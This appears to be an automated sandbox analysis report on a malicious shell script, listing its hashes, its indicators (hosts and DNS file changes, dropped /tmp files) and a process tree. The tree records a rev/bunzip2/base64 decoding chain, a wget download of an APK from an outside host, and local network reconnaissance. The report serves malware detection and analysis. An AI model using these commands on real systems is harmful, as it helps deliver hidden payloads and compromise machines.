Analysis
-
max time kernel
0s -
max time network
121s -
platform
linux_mips -
resource
debian9-mipsbe-en-20211208 -
resource tags
arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
15/03/2023, 11:04
Static task
static1
Behavioral task
behavioral1
Sample
app_mod copy.sh_
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
app_mod copy.sh_
Resource
debian9-armhf-20221111-en
Behavioral task
behavioral3
Sample
app_mod copy.sh_
Resource
debian9-mipsbe-en-20211208
Behavioral task
behavioral4
Sample
app_mod copy.sh_
Resource
debian9-mipsel-20221111-en
General
-
Target
app_mod copy.sh_
-
Size
51KB
-
MD5
5a8c1fac337fb034f3a7456b0c416758
-
SHA1
d883644c417a5f1543b88f2ac407ee84e1425420
-
SHA256
902a66ff2a651275836d70b621a02225c3cdefc98dc4d28faee3ba772f65da2b
-
SHA512
8adba312ef13f5628bffbb6f399f65d50f7479874fda4c191bc10e51fd48a49d5b8d247bc2cfbc99d6fe9a76fe5500976571d6ac4a150efae144ece3f5d1248a
-
SSDEEP
1536:DxEyGznImjPZzlz1pxvp4eWbOvWM2I306DMmAgu:DxEyGznI4xl4jOvzhDMz
Malware Config
Signatures
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
description ioc Process /etc/hosts /etc/hosts wget -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
description ioc Process /etc/resolv.conf /etc/resolv.conf wget -
Reads runtime system information 2 IoCs
Reads data from /proc virtual filesystem.
description ioc /proc/321 /proc/321 /proc/353 /proc/353 -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process /tmp/sh-thd.Hon5Ey /tmp/sh-thd.Hon5Ey Process not Found /tmp/sh-thd.bUq9CZ /tmp/sh-thd.bUq9CZ Process not Found /tmp/sh-thd.VEhENb /tmp/sh-thd.VEhENb Process not Found /tmp/app_mod copy.sh_ /tmp/app_mod copy.sh_ app_mod copy.sh_ /tmp/sh-thd.OcHwk3 /tmp/sh-thd.OcHwk3 app_mod copy.sh_ /tmp/sh-thd.CAPpFt /tmp/sh-thd.CAPpFt Process not Found
Processes
-
/tmp/app_mod copy.sh_"/tmp/app_mod copy.sh_"1⤵
- Writes file to tmp directory
PID:321
-
/usr/bin/revrev1⤵PID:328
-
/bin/bunzip2bunzip2 -c1⤵PID:333
-
/usr/bin/base64base64 -d1⤵PID:332
-
/bin/catcat1⤵PID:337
-
./!"./!"1⤵PID:342
-
/bin/bashbash -c ";"1⤵PID:344
-
/usr/bin/revrev1⤵PID:349
-
/bin/bashbash1⤵PID:346
-
/bin/bash/bin/bash2⤵PID:350
-
/bin/bashbash3⤵PID:353
-
-
-
/usr/bin/base64base64 -d1⤵PID:356
-
/bin/bunzip2bunzip2 -c1⤵PID:357
-
/bin/catcat1⤵PID:361
-
./_./_1⤵PID:366
-
/bin/bashbash -c ";"1⤵PID:368
-
/usr/bin/wgetwget -o wikipedia.apk https://int3.sk/wikipedia.apk1⤵
- Modifies hosts file
- Writes DNS configuration
PID:370
-
/sbin/ipip addr1⤵PID:372
-
/bin/grepgrep 1921⤵PID:373
-
/usr/bin/awkawk "{print \$2}"1⤵PID:374
-
/usr/bin/cutcut -d. -f 1-31⤵PID:375